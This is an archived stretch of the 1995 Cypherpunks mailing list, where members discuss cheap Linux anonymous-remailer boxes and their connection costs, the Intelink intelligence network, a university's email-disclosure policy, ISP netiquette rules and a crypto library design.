OK, let's ponder the minimum hardware necessary, possible minimal configuration (Intel/clone based): (1) Case. (2) Power supply. (3) Motherboard/CPU and 4mb RAM. (4) Hard drive w/ controller. (5) modem card. (5) No monitor, keyboard, floppy, or video card. (a) would require some "umbilical cord" connection to initially set up from another PC. (b) need to operate on "umbilical", direct and uucp modes. I am just thinking out loud here, but the hardware could be damn cheap (sub $500). You can find old 386 boards with 4mb right on the board (no SIMMs) for next to nothing (the decreasing popularity of 30-pin SIMMs makes this a surplus store reality, as nobody wants to bother to strip out the RAM chips anymore). I have also seen an ad by the KILA company in Boulder, CO who advertise some sort of compact pc-on-a-card deal, that might be applicable. Comments? ------------------------------------------------------------------- P M Dierking | From rsalz at osf.org Thu Jan 19 11:30:17 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 19 Jan 95 11:30:17 PST Subject: Cone of silence update Message-ID: <9501191925.AA27121@sulphur.osf.org> ---------- Begin Forwarded Message ---------- Date: Wed, 18 Jan 95 21:03:02 -0500 From: burton at het.brown.edu (Joshua W. Burton) To: silent-tristero at world.std.com Subject: Cone of silence update I haven't been able to turn up the original New York Times article I saw, but our own Providence (RI) Journal today reprinted an article from the Washington Post, no date given, that tells substantially the same story, though without any mention of the cost of Intelink. Since a few people have asked me for details, I thought I'd better post this verbatim. Be sure to save a copy, in case this article disappears the way the first one I saw did.... 
GOVERNMENT'S SECRETS FLOW THROUGH AN INTERNET CLONE WASHINGTON - When the US intelligence community recently decided to modernize the way it communicates, it did what countless other government agencies, businesses and individuals have done over the last few years: it turned to the Internet. But the regular Internet wouldn't do. For spies and other government officials concerned about secrecy, that very public, very uncontrollable global mesh of computer networks was too risky a place to do business. So the intelligence community created its own Internet. Dubbed Intelink and based on the same technology used to run and navigate the original Internet, this new network for sharing supersecret information---including satellite imagery and video footage---officially began operating just a few weeks ago. When the bugs are worked out and a final system is in place, it will allow analysts, policy-makers, military officials and soldiers in the field to tap quickly and directly into classified information at the Central Intelligence Agency, the National Security Agency, the Pentagon and diverse other parts of the national security bureaucracy. Those familiar with Intelink say it could promote cooperation in a business characterized by internecine rivalry, and that at the very least it will centralize and speed up information retrieval. ``This is a major breakthrough,'' said Barry Horton, principal deputy assistant secretary of defense for command, control, communications and intelligence. ``Intelink for the first time, in a user-friendly environment, allows every element of the intelligence community and every element of the Department of Defense to reach into every other element,'' he said. As one might imagine, it's not for everybody. Horton said the system is now available only to people with ``Top Secret'' or higher security clearances. 
Moreover, those who run the system eventually will have to confront a major issue of how to make Intelink flexible enough to accommodate users with a variety of clearances. There are many levels of classification higher than Top Secret, and for Intelink to be useful to those working on the most secret programs, the officials responsible would have to be comfortable placing such information on the system. And, while Pentagon and CIA officials spoke of how Intelink promises to improve communication and cooperation among the agencies and reduce duplication of effort, others said there is good reason to be skeptical. The intelligence community has made innumerable attempts to eliminate redundancy and streamline information channels, but there has been little progress. ``It's gone like gangbusters since its inception, but any Internet-like thing grows overnight. The question is, is it going to mature well? And how will it operate in a time of crisis?'' said Ross Stapleton-Gray, who recently left the CIA to start a business providing Internet services to embassies in Washington. In a way it is fitting that what some call an Internet ``clone'' should come out of the national security bureaucracy. Internet itself was started under Department of Defense sponsorship in the 1960s, as an attack-proof communications link among military, corporate and university research centers. ``Remember, Internet is a DoD creation,'' said Neil Munro, a reporter for Washington_Technology, a local business newspaper, who recently broke the story about Intelink's start-up. ``This is the prodigal son....They created it and now it comes back in much stronger fashion.'' All those familiar with the system said it is totally walled off from the Internet, and designed never to be penetrated. But several experts familiar with Intelink noted that no system is ever totally secure. ``This would obviously be a Mount Everest for hackers,'' said John E. Pike of the Federation of American Scientists. 
But Pike, who said he thinks Intelink has the potential to ``revolutionize'' the intelligence community, added that it would be so difficult to crack he doubts many will try. The network now operates among several dozen intelligence agencies and centers. But it is the talk of the intelligence community, and its reach is expected to grow rapidly. Those who now have regular access to it number in the hundreds, estimated Martin C. Faga, general manager of the Center for Integrated Intelligence Systems at the Mitre Corp., the company that helped the intelligence agencies set up the system. ----------- End Forwarded Message ----------- From tcmay at netcom.com Thu Jan 19 11:51:40 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 19 Jan 95 11:51:40 PST Subject: "Time" Magazine and "Future Shock" Author Message-ID: <199501191940.LAA09311@netcom15.netcom.com> [I'm into my daily "blackout" of toad mail to Netcom, so am posting blind, as usual. If this article has already been posted, my condolences.] The January 23rd issue of "Time," this week's issue, features a cover story on talk shows, Limbaugh, Gingrich, and "HyperDemocracy." I haven't seen the physical issue yet, but have skimmed the Web version at: http://www.timeinc.com/time/magazine/magazine.html Point your browser at it and have fun. Lots of folks are flaming the article, in the usual newsgroups (e.g., alt.data-highway). Me, I'm as scared as "Time" is about "direct, electronic democracy," though perhaps for different reasons. On a related note, the article and sidebars touch heavily on the "cybergurus" who are advising Newt Gingrich on his journey into cyberspace, notably Alvin Toffler ("Future Shock," "The Third Wave," "Powershift," etc.) and George Gilder ("Beyond Wealth and Poverty," "Macrocosm," lots of essays on the Net). As it happens, I spent some time talking to Alvin and Heidi Toffler at an interview last Friday in L.A.--they were being interviewed before and after me. 
Not enough time to really get into issues, and of course they did most of the talking (Heidi is especially opinionated, and had just been in a highly publicized battle with newage guru Arianne Huffington, spacey wife of losing candidate in California, Michael H.). Anyway, we talked about John Brunner (as you all know, Brunner's seminal "The Shockwave Rider," was inspired by "Future Shock") and his ideas. (And we all agreed that "Stand on Zanzibar" was his crowning achievement...even Shalmaneser admitted "Christ, what an imagination he's got.") Tidbits: * on digital cash: Heidi: "Oh, we're for it! Did you hear what I just told the interviewer?" (I didn't, as I was in the adjacent room. Later comments lead me to believe that neither of the Tofflers has a clear idea of what's going to happen with digital cash and crypto anarchy.) * on the NSA and the t-shirt I showed them ("Cypherpunks: putting the NSA out of business"): "Oh, no, we need a strong NSA now more than ever!" (What else would I expect? They view the NSA as the main bastion against terrorists plotting to blow up the World Trade Center. Alvin was generally more reserved and thoughtful. When I pointed out that the very hotel room we were in could be used to plot crimes, even nuclear terrorism, and that the solution to stop this would have to be an Orwellian regime of continuous monitoring, Alvin nodded thoughtfully, but Heidi just sniffed. I mention this to give a flavor, just a whiff, of what senior advisors to the most influential man in America are thinking.) * I gave Alvin a copy of my "Crypto Anarchy and Virtual Communities" paper. * My interview was pretty disappointing, by the way. Lots of sitting around, delays in getting my laptop hooked up to Netcom (outside calls had to be unblocked). The interviewer wanted memorable, quotable stuff from me, but I felt constricted sitting around and being expected to spout on cue. Maybe they'll get a few minutes of usable stuff.... (Print media is so much better. 
An interviewer can let the tape recorder run for hours, can edit the containing material of a quote, and can thus produce clear, coherent quotes. A video interview is more constrained in lots of ways, and offending gestures or rambling interjections cannot be easily edited out. As one example, at one point I naturally (to me at least) said something about "As we just saw...." Well, this made this quote unusable. And so it goes.) I was generally unhappy with the whole thing. Four hours to get there, two hours spent waiting around, an hour to resolve problems, an hour under the camera lights (being told not to move, to "use the mouse," to "tell us why cryptography is important," etc.), and five hours to get home. All for a few minutes at most on a t.v. show. Oh, the show is the BBC's "Horizons" science series, which may also get sold to U.S. outlets, etc. I think the title will be "The Information Bomb," and features segments on information warfare, a la Winn Schwartau's views, the Tofflers, some military planners, and--maybe--me. I don't have high hopes for my segment. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From arthurc at crl.com Thu Jan 19 11:58:06 1995 From: arthurc at crl.com (Arthur Chandler) Date: Thu, 19 Jan 95 11:58:06 PST Subject: "Disclosing" private email Message-ID: Greetings! I'd like to solicit your/our best thoughts on the following message. San Francisco State University is considering a policy of "disclosing" private email to outside agencies. 
I'm aware that such a policy is yet another argument for using crypto; and the last cypherpunks meeting gave some encouraging instances of "transparent" encryption schemes that are not a hassle or a fear-barrier for newbies. But if you could post or private email me your thoughts about the legal/ethical aspects of "disclosure," I'd be much obliged. I've put a few of my own concerns at the end of the enclosed quote. ---------- Forwarded message ---------- >From: "Deirdre C. Donovan" > >I am rewriting the information handouts which we here in San Francisco >give out to our students when they apply for Internet access accounts. >The issue with which I am struggling is one of privacy. I have heard of >universities (anecdotally only) where the administration reserves the >right to read E-mail. Here, we are leaning more toward something like the >paragraph below, which is taken verbatim from an Indiana University draft >document. > > IU computing centers will maintain the confidentiality of all > information stored on their computing resources. Requests for > disclosure of confidential information will be reviewed by the > administrator of the computer system involved. Such requests > will be honored only when approved by University officials > authorized by the [President] of the campus involved, or when > required by state or federal law. Except when inappropriate, > computer users will receive prior notice of such disclosures. > I'm uneasy about the chain of "prior notice": 1) Does this policy give university administrators the power to read private email before the decision is made to "disclose" it to outside persons or agencies? 2) Does this "prior notice" mean "We're going to do it" or "We plan to do it, and if you disagree, let's discuss it before we release it"? 3) What constitutes "inappropriate"? From perry at imsi.com Thu Jan 19 12:04:37 1995 From: perry at imsi.com (Perry E. 
Metzger)
Date: Thu, 19 Jan 95 12:04:37 PST
Subject: UUNET Customer Liaison: USENET "netiquette" Reminder
Message-ID: <9501192004.AA04647@snark.imsi.com>

It would appear that UUNET does not consider themselves to be a common carrier any more -- they now claim the right to cut sites off for violating netiquette.

.pm

------- Forwarded Message

From: help at uunet.uu.net (UUNET Customer Liaison)
Message-Id:
Subject: USENET "netiquette" Reminder
To: news-subscribers at uunet.uu.net
Date: Thu, 19 Jan 1995 13:26:40 -0500 (EST)

Because of recent improper use by users on AlterNet sites we are sending out this reminder to all sites currently subscribing to news. If you have not reviewed the accepted USENET netiquette with your users recently we strongly suggest you take this opportunity to do so.

Before you or your users post to USENET, please take the time to learn the rules of the environment which you are entering. Doing so can make the difference between creating a good name for you and your company on the Internet or a bad one.

Please read the postings contained in news.announce.newusers to familiarize yourself with the etiquette of USENET. This information may also be obtained via anonymous FTP at UUNET's archive (ftp.uu.net) in the directory /usenet/news.answers/news-newusers-intro.Z

UUCP customers may obtain the file via UUCP.

It is your responsibility to ensure that the users on your system are also aware of the proper guidelines for posting to USENET. Improper use of "netiquette", the guidelines of the USENET community, will be viewed as a violation of the rules of a network. This is in violation of your contract with UUNET/AlterNet and will likely result in a loss of news posting privileges for your site.

Tamara Bowman                help at uunet.uu.net
Manager Technical Support    uunet!help
UUNET Technologies, Inc.

------- End of Forwarded Message

From tcmay at netcom.com Thu Jan 19 12:20:45 1995
From: tcmay at netcom.com (Timothy C.
May)
Date: Thu, 19 Jan 95 12:20:45 PST
Subject: The Remailer Crisis
In-Reply-To: <199501191847.KAA28985@netcom15.netcom.com>
Message-ID: <199501191958.LAA13462@netcom15.netcom.com>

> Jeff's response is exactly what I was hoping for! The "Cypherpunks
> distribution" version of Linux would be a great way to spread cheap
> remailer technology on cheap Linux boxes. Hell, I might even augment
> my Macs with one of these things!

One thing I should've noted is that a Linux-based cheap remailer is mostly useless without a "live connection" to the Net. That's why I mentioned hanging these directly off The Little Garden's net (i.e., putting the box in the same building as the physical net, to avoid expensive connections).

What are the cheapest "live connections" (24-hour a day connections) available? Where I am, about $100 a month, plus whatever the local phone company charges for a dedicated line. ISDN is an option, but it looks to cost $400-800 to get started, plus a monthly charge (which I don't recall, except that I "gulped" when I heard it).

So, even an el cheapo 486-based Linux box, for perhaps $800 or so, would need to solve the problem of a cheap, continuous connection to the Net. (My supposition is that one approach is to share these connections, hence my notion of hanging machines on other people's nets.)

At $100-200 per month for connect charges, I don't expect a "cheap Linux distribution" will cause many people to set up remailers.

What have I overlooked?

Are there options for several machines to share a connection? (I'm sure there are....). Someone who already has a connection may be willing to host additional machines, which could share some of the charges.

--Tim May

--
..........................................................................
Timothy C.
May                    | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From perry at imsi.com Thu Jan 19 12:31:09 1995
From: perry at imsi.com (Perry E. Metzger)
Date: Thu, 19 Jan 95 12:31:09 PST
Subject: The Remailer Crisis
In-Reply-To: <199501191958.LAA13462@netcom15.netcom.com>
Message-ID: <9501192029.AA04709@snark.imsi.com>

Timothy C. May says:
> What are the cheapest "live connections" (24-hour a day connections)
> available? Where I am, about $100 a month, plus whatever the local
> phone company charges for a dedicated line.

In NYC, you can get a permanent dial up slip account for $75 per month -- no dedicated line charges because there is no dedicated line per se. Phone charges will add an additional $12 per month.

Perry

From rsalz at osf.org Thu Jan 19 12:47:08 1995
From: rsalz at osf.org (Rich Salz)
Date: Thu, 19 Jan 95 12:47:08 PST
Subject: UUNET Customer Liaison: USENET "netiquette" Reminder
Message-ID: <9501192040.AA27218@sulphur.osf.org>

> It would appear that UUNET does not consider themselves to be a common
> carrier any more -- they now claim the right to cut sites off for
> violating netiquette.

Strange. First, they were never a common carrier: they went to some legal pains to get registered as an enhanced service provider. I don't know what the differences are, but when the first "Internet Porn" article by Joe Abernathy appeared years ago, Rick wasn't worried. He told me ESP was better than CC, but I don't remember why (perhaps it was no FCC regulation?)

It's unclear how this new policy affects their ESP status.
/r$

From zoo at armadillo.com Thu Jan 19 12:58:27 1995
From: zoo at armadillo.com (david d `zoo' zuhn)
Date: Thu, 19 Jan 95 12:58:27 PST
Subject: The Remailer Crisis
Message-ID: <199501192056.OAA24035@monad.armadillo.com>

// Are there options for several machines to share a connection? (I'm
// sure there are....). Someone who already has a connection may be
// willing to host additional machines, which could share some of the
// charges.

Around here (in the Twin Cities) one can get a dedicated connection for $100/month without any startup fees. And of course one can set up a local network and use the machine with the modem link as a router.

Having one of these dedicated lines, I'd be happy to host remailer-boxes at my site. Ideally, they'll be small & only require a network cable and a power cord.

I'm also willing to seriously consider initiating remailer-accounts on my machine. If you'd be interested in a remailer account, drop me a line.

--
- david d `zoo' zuhn -| armadillo zoo software -- St. Paul, Minnesota
-- zoo at armadillo.com --| unix generalist (and occasional specialist)
------------------------+ http://www.armadillo.com/ for more information
pgp key upon request +----------------------------------------------------

From jalicqui at prairienet.org Thu Jan 19 13:05:11 1995
From: jalicqui at prairienet.org (Jeff Licquia)
Date: Thu, 19 Jan 95 13:05:11 PST
Subject: Remailer-on-a-CD
Message-ID: <9501192105.AA29392@firefly.prairienet.org>

>>The "Linux mavens" followed by the "black box" stuff sparked an idea...
>
>>package. To make it as easy as possible, I'd use the UMSDOS filesystem so
>>that Linux could be installed on a DOS machine without any reformatting
>>repartitioning, or similar headaches.
>
>>distribution already has) and some boot options, you'd have an "instant
>>remailer" software package, able to transform any 386SX/4MB RAM DOS machine
>>or better into a Linux-based remailer site, complete with aliases, logging
>
>>So, am I dreaming, or does this sound viable to y'all?
>
>OK, let's ponder the minimum hardware necessary,
>possible minimal configuration (Intel/clone based):
>
>(1) Case.
>(2) Power supply.
>(3) Motherboard/CPU and 4mb RAM.
>(4) Hard drive w/ controller.
>(5) modem card.

Add "standard serial port" here, for reasons I'll get into in a moment...

>(5) No monitor, keyboard, floppy, or video card.
>    (a) would require some "umbilical cord" connection to initially
>        set up from another PC.
>    (b) need to operate on "umbilical", direct and uucp modes.

The "umbilical cord" here could be a standard serial port; this could be used in several ways. In addition, Linux has the ability to do TCP/IP through the parallel ports (using a LapLink-style protocol), so that could possibly work as well. There are a few options here:

Reuse the monitor, keyboard, etc. for each installation.

Go ahead and throw in the floppy, and set up the Linux kernel on the floppy to use the serial port as the console instead of the monitor/keyboard.

Connect your second PC using the PLIP (that's the parallel port IP stuff) protocol. On the second PC, one would run a program that would telnet to the first PC and run the install program, which would run via NFS on the PLIP line.

>I am just thinking out loud here, but the hardware could be damn
>cheap (sub $500). You can find old 386 boards with 4mb right on
>the board (no SIMMs) for next to nothing (the decreasing popularity
>of 30-pin SIMMs makes this a surplus store reality, as nobody
>wants to bother to strip out the RAM chips anymore).

As far as price, I've seen 386SX motherboards run for $99.
At a going rate of $50 per MB of RAM, buying a used MFM disk and controller for, say, $40 (I had the option of buying a junk box full of stuff, including two 20MB drives and a 10MB, for $100), some cheap $10 everything-board, a $70 14.4 modem, and a power supply at $50 (here I may be way off), that adds up to... $470. Not a bad guess! And this assumes you pay new prices for the motherboard, RAM, multiport, modem, and power supply...

Also, if you wanted to splurge, you could opt for a few more MB of RAM and a CD-ROM drive. With our recently pressed "Cypherpunk Toolkit" CD-ROMs :-) and a boot floppy, you wouldn't necessarily need to install anything at all; the Linux kernel could store site-specific info (entered the first time you booted up via a cute user-friendly interface) on the floppy and load it to a RAMdisk, mounting the CD-ROM for all the rest of the interesting stuff. On multipurpose systems (you only use the computer a few hours per day and run the remailer using some store-and-forward system the rest of the time), this wouldn't take up any hard disk space, and your remailer could conveniently disappear with a simple Ctrl-Alt-Del and the slam of a safe door. ("But officer, all I have on my hard drive is DOS and Windows. See for yourself! I don't even have PGP here...")

You know, the more I think about this, the more ideas pop into my head. I'd better quit before I get dizzy...

What if the site-specific stuff on the floppy were encrypted... or the kernel... ? Could we use Matt Blaze's CFS...? Store the site-specifics on a data haven for backup... with auto-download on bootup... notebook remailers in car trunks using RadioMail or POP3 that have no single physical location... dynamic remailer configuration (download your IP address and alias info, etc. from the Remailer Server)...?

STOP THE WORLD, I WANT TO GET OFF!!!

There; that's better.

Maybe I'll play around this weekend and try building a minimal Linux distribution (on what hard disk space :-).
Then again, maybe I won't, so don't be bashful to play around on your own!

From jml at wizard.synapse.net Thu Jan 19 13:20:22 1995
From: jml at wizard.synapse.net (jml at wizard.synapse.net)
Date: Thu, 19 Jan 95 13:20:22 PST
Subject: Internet World Magazine
Message-ID: <199501192119.QAA21262@sentinel.synapse.net>

This month's issue of Internet World Magazine deals primarily with internet security. I am not going to review everything in the mag but I'll list the table of contents:

Better Safe: Danger lurks on the Info Highway. You must take precaution to reduce your risks. By Dave Taylor and Rosalind Resnick

Getting Cryptic: Phil Zimmermann's PGP gives you powerful encryption to keep your messages safe from prying eyes. Read all about it. By William Stallings. (Introductory article about PGP. Nothing we, here, don't already know)

Securing the Enterprise: Connecting your corporation to the Internet can be a security nightmare. Firewalls are the main line of defense. By Alton Hoover (An overview of Firewalls, application-layer gateways and token-based authentication schemes)

Beyond the Firewall: The latest firewall technology not only detects intruders, but strikes back. By Winn Schwartau (Very interesting article. Here are some quotes to whet your appetite:

Wouldn't it be nice if a computer system attacked from the Internet responded to the attack by striking back at the intruder? This is exactly what Sidewinder's implementation of type enforcement does.....It will detect the intrusion immediately....As soon as a violation occurs, a silent alarm is activated....sidewinder can be configured to react in any number of ways, once an attack has been detected...it can shut the intruder cold...(or)...it can invoke a mechanism that would record all the information from whence came the attack....By luring the attacker into a false sense of security, the hacker would continue trying to break in, unaware that every step was being recorded...
Cashing In: As Internet commerce expands, a host of companies are vying to establish their system as the basis for cyberbanking and credit-card transactions. By Lisa Morgan

Business Browser: New versions of Mosaic with built-in encryption promise to keep your transactions safe. By Richard W. Wiggins

Unlawful Entry: Crackers can feast on your data if you fail to plug your leaky Unix system. By Aaron Weiss (Five Ways to crack a Unix System)

It's Alive: Although the furor has subsided, reports of Clipper's death are greatly exaggerated. The government's controversial eavesdropping effort lives on. By Steven Vaughan-Nichols

Building Trust: The chief executives of Trusted Information Systems -Steve Crocker and Steve Walker- talk about encryption, CyberCash, Clipper, and more. By Jeff Ubois.

All in all a rather interesting mag. Check it out.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
wizard at alpha.c2.org
Give me the liberty to know, to utter, and to argue freely according to conscience, above all liberties.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From frissell at panix.com Thu Jan 19 13:25:48 1995
From: frissell at panix.com (Duncan Frissell)
Date: Thu, 19 Jan 95 13:25:48 PST
Subject: The Remailer Crisis
Message-ID: <199501192123.AA29095@panix.com>

-----BEGIN PGP SIGNED MESSAGE-----

At 01:14 AM 1/19/95 -0800, Timothy C. May wrote:

>* I favor separating the "account that remails" from the "owner of the
>site," as I have argued in vain in the past. (Example: a willing site
>gives out or sells many accounts...each is legally separate, and each
>must be legally challenged. My longer posts dealt with this.)

I offer to pay for and operate a remailer account on any system that will have me. Do we have the software yet to run a remailer out of an account?

>It's time to get cracking on this crisis.

The Cable companies may come to our rescue. Even old fuddy-duddy Cablevision is going to be offering connections this year.
If those connections are characterised merely as physical connections, that could offer legal protections.

My contrib for now will be to draft an all purpose response letter to respond to civilian and official complaints concerning remailer abuse.

DCF

- --
You know, Private Idaho brings PGP signing within about 10 keystrokes in any Windows mailer.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx6vUYVO4r4sgSPhAQFjzgP/ZVAonNBsZpMCg/tlWohvC7ratGTZWtCz
/WXC+Z1PAKhigdz8VhWhkPXLj/jYba1LUMBI9giNP6T9TSxMw6jjzgvs44tw4LF4
X0pF/lv9OS7GKcPw//4FyB1FKgfwpJA+mHr8gqlLrxREXv3qpHfKRuu/ecg5urmS
jwiSSKsjZhU=
=Aoq4
-----END PGP SIGNATURE-----

From jcorgan at scruznet.com Thu Jan 19 13:29:29 1995
From: jcorgan at scruznet.com (Johnathan Corgan)
Date: Thu, 19 Jan 95 13:29:29 PST
Subject: The Remailer Crisis
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>What are the cheapest "live connections" (24-hour a day connections)
>available? Where I am, about $100 a month, plus whatever the local
>phone company charges for a dedicated line. ISDN is an option, but it
>looks to cost $400-800 to get started, plus a monthly charge (which I
>don't recall, except that I "gulped" when I heard it).

I am currently using ISDN from my home in San Jose. You're right in that the startup costs are the barrier--even a cheap single B channel (56K) terminal adapter for use with a serial port will run $300-$400 dollars. The telco charges are minimal in my area; $25 monthly for the line itself (115 Kbps async bandwidth). Connect charges are free for non peak usage, and $0.60/hour for peak usage time (0800 to 1700) Mon-Fri.

This is the Pacific Bell "Residential" ISDN plan. For business lines, it goes up to $50 monthly with $0.60/hour 24 hours a day.

In addition to this would apply any standard long distance charges that would apply to a particular call.

This is an excellent setup for fast, cheap, INTERMITTENT connection to the Internet.
My particular ISP is in Santa Cruz, with POPS in SC, SJ, and soon Monterey. An unlimited connect time PPP account runs $75 monthly. This actually gets me a three bit subnet so that I can put five IP boxes and an ISDN router on my ethernet at home.

A remailer in this scenario would need to have their MX record point to their ISP, and process mail via POP (incoming) and SMTP (outgoing). It would be straightforward to implement a timed or demand dial scenario (say, every fifteen minutes) to accomplish this. While not the ideal (continuous internet connection with pure SMTP based mail transport), it would suffice for a moderately loaded remailer, I'd imagine.

Of course, this involves the mail subsystem of your ISP, partially defeating the purpose of having ubiquitous anonymous remailer "instances" whose operation is outside the control of an ISP. Still, it would be a good start.

==
Johnathan Corgan         "Violence is the last refuge of the incompetent."
jcorgan at scruznet.com  -Isaac Asimov

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx7Y2E1Diok8GKihAQExmwP8DmWuHMunZoaA4Y8qh7jx56hqgs4p3Bgo
DgHf2J4FoPwzVzXwSH0ep+1tKkHWNnDTXB7UVtuZjLF4uE4HtY72d0ANEfZ0AgPw
9peOBzZoukxpl6nMmHszUBWXxfP4DJW9AvbPdzOWFE1OAMIQLi6mpEyGE3Vouv61
WX+4gzx+4M0=
=iP7S
-----END PGP SIGNATURE-----

From jalicqui at prairienet.org Thu Jan 19 13:52:28 1995
From: jalicqui at prairienet.org (Jeff Licquia)
Date: Thu, 19 Jan 95 13:52:28 PST
Subject: The Remailer Crisis
Message-ID: <9501192150.AA14796@firefly.prairienet.org>

>
>> Jeff's response is exactly what I was hoping for! The "Cypherpunks
>> distribution" version of Linux would be a great way to spread cheap
>> remailer technology on cheap Linux boxes. Hell, I might even augment
>> my Macs with one of these things!
>
>One thing I should've noted is that a Linux-based cheap remailer is
>mostly useless without a "live connection" to the Net.
>That's why I
>mentioned hanging these directly off The Little Garden's net (i.e.,
>putting the box in the same building as the physical net, to avoid
>expensive connections).

Not necessarily. Imagine, for example, a FidoNet or UUCP remailer. It might be nice for Internet users to have some kind of mail aliasing in the DNS for you, but it wouldn't be required by any means. I think it would be better to have lots of remailers with ugly addresses (like "jeff%jtj-l.uucp at cei.com", which is my address on my Linux box at home) than only a few with nice ones. (FidoNet has its own problems, such as paranoid BBSes that disallow encrypted traffic, but that's another matter.)

These remailers wouldn't even need to be up 24 hours; you could run it at night, calling up on bootup and every hour thereafter or something. It's not perfect, to be sure, but what else is perfect?

I don't know how hard it is to get in on the local FidoNet, but UUCP isn't too hard, and is a lot cheaper. When I was in college, my college gave me a feed for free. I'm not so familiar what providers charge.

Of course, university accounts have their good and bad points; however, if you could persuade someone offsite with control over a domain name (for example, "remailer.net" :-) to give you a mail alias on their domain, this would take a bit more effort to track than your typical "remailer.uiuc.edu" type domain. This would make it less likely that the university would hear complaints, also, since most complainers would be more likely to complain to "postmaster at remailer.net" than "postmaster at uiuc.edu" if your machine was called "anon at anarchy.remailer.net" instead of "anon%anarchy.uucp at uiuc.edu" or "anon at anarchy.uiuc.edu".

And this doesn't even get into the neato-cool new services you West Coasters get, like RadioMail...

>What are the cheapest "live connections" (24-hour a day connections)
>available?
>Where I am, about $100 a month, plus whatever the local
>phone company charges for a dedicated line. ISDN is an option, but it
>looks to cost $400-800 to get started, plus a monthly charge (which I
>don't recall, except that I "gulped" when I heard it).

Around here, it isn't even available unless you access through the CompuServe numbers or call long distance (read: $$$). That may be changing soon...

>So, even an el cheapo 486-based Linux box, for perhaps $800 or so,
>would need to solve the problem of a cheap, continuous connection to
>the Net. (My supposition is that one approach is to share these
>connections, hence my notion of hanging machines on other people's
>nets.)

No need for even a 486. If it takes an hour to process a remailer script, so much the better for the mix. You could call it a "required latency feature". :-)

>Are there options for several machines to share a connection? (I'm
>sure there are....). Someone who already has a connection may be
>willing to host additional machines, which could share some of the
>charges.

Set up correctly, these "Remailer-In-A-Box" type machines could do several things to share a connection. They could, for example, all be connected with serial cables and use UUCP to get mail where it needs to go. I believe, in addition, that you can chain up to three deep with PLIP. This of course assumes that Ethernet isn't an option.

From xpat at vm1.spcs.umn.edu Thu Jan 19 14:43:31 1995
From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu)
Date: Thu, 19 Jan 95 14:43:31 PST
Subject: AT&T IVES chip
Message-ID: <9501192243.AA21298@toad.com>

Interpretive Summary From PC Week: "Security Chip, interface aim to assist Electronic Commerce"

AT&T IVES (Information Vending Encryption System) chip will encrypt data, video on demand, banking, etc. The IVES chip will be used in AT&T cable-TV-boxes this year. It is available to OEM's for Internet data security applications. IVES uses algorithms licensed from RSA.
No mention of any dreaded built-in peephole.

---------------------------------------------------------------------
P M Dierking |

From jrochkin at cs.oberlin.edu Thu Jan 19 14:54:52 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 19 Jan 95 14:54:52 PST
Subject: The Remailer Crisis
Message-ID:

At 4:49 PM 01/19/95, Jeff Licquia wrote:
>persuade someone offsite with control over a domain name (for example,
>"remailer.net" :-) to give you a mail alias on their domain, this would take
>a bit more effort to track than your typical "remailer.uiuc.edu" type
>domain. This would make it less likely that the university would hear
>complaints, also, since most complainers would be more likely to complain to
>"postmaster at remailer.net" than "postmaster at uiuc.edu" if your machine was
>called "anon at anarchy.remailer.net" instead of "anon%anarchy.uucp at uiuc.edu"
>or "anon at anarchy.uiuc.edu".

I was thinking of this same thing. I'm hopefully going to have a unix box on the net in my college dorm room soon, but I'm a bit hesitant to run a remailer on it. I'm a bit scared to ask whether it would be allowed, on the "it's better to get forgiveness than permission" line of thought. But I'd rather avoid the potential of having to get forgiveness either. If my site had a "machine.remailer.net" address, there would be many benefits. For one, I don't have to worry about some administrator coming across a list of anon remailers (in a Time magazine scare-tactic article, eek!), and noticing that one of them appears to be operating from some student's dorm room, and secondly, as Jeff says, people who complain are just going to complain to admin at remailer.net. They aren't going to take the time to try to figure out that my IP address is really in oberlin.edu, and complain to postmaster at oberlin.edu.
So administration at oberlin would never even realize I was running a remailer, and since they haven't yet made any indication that that would be against the rules, I would be in a good position.

Maybe it's time for Eric to figure out what he's going to do with remailer.net.

From cactus at hks.net Thu Jan 19 15:01:58 1995
From: cactus at hks.net (Insomnia Gallumbits)
Date: Thu, 19 Jan 95 15:01:58 PST
Subject: Status of GUCAPI
Message-ID: <199501192306.SAA16798@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

I'm just about done with the first part of my crypto library, the internal generalized I/O, and largely done with the framework for the encoding rules. Since I haven't fully outlined what I'm doing here, I thought I'd mention the outline in the hopes of getting some real feedback and perhaps some random snippets of code.

In essence, what I'm building is a crypto library that takes a very general approach with a few parameters controlling its behavior. The idea is to have something that anybody can drop into their mail agent and have an easy way of using crypto and interface with existing systems such as PGP. A major design goal is to be backwards compatible with PGP, but paramount is having a plug-and-play library that will be flexible enough to meet future crypto needs.

One of the biggest problems today is that crypto libraries are chiselled out to deal with very specific cases -- the most general I know of is RSAREF, which AFAIK only supports BER/DER for encoding and RSA and DES/CBC for encryption. I'll grow more clueful on that, and other crypto and key management issues, as I get to actually working on them.

The things that I've parametrized in the design are:

- Type of I/O. Right now, files (and fds) and a couple of memory configurations are supported. I've made it trivial to add new types of I/O as well, and there are flags to support immediate zeroing of data once it is read into the internal structures.

- Encoding of data.
There are multiple ways to encode a bytestream and these methods can be nested. For example, PGP, MIME, and uuencode use their own formats. In this library, you can specify the type. I also want to eventually put logic in (where possible) to determine the type and will also use this to support various compression schemes.

